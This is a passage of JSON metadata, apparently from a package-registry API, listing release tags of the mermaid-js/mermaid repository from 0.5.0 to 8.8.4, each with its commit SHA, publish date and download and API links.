g/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/